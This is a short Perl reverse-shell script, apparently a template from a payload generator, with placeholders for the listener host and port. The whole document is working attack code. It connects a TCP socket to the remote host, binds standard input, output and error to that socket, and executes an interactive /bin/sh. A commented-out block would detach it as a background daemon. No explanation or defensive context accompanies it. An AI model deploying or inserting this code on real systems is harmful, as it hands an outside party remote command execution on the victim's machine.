use Socket;
$i="{{ lhost }}";
$p={{ lport }};

# Background and dissociate from parent process if required
#if ($daemon) {
#	my $pid = fork();
#	if ($pid) {
#		cgiexit(0); # parent exits
#	}
#
#	setsid();
#	chdir('/');
#	umask(0);
#}

socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){
    open(STDIN,">&S");
    open(STDOUT,">&S");
    open(STDERR,">&S");
    exec("/bin/sh -i");
};
